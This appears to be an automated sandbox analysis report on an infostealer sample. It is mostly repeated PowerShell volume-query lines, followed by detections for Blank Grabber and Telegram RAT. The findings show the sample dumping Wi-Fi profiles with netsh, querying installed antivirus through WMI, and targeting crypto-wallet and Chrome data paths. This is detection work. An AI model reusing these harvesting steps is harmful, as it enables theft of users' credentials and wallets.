              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF7C266D080
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C2685C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,4_2_00007FF7C2685C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,97_2_00007FF7080D48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000007.00000003.1686994735.000001E7C3B87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1689633424.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1275666676.000001FB29EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1275666676.000001FB29EE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1689985178.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3396, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI33962\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C346C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal WLAN passwords
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
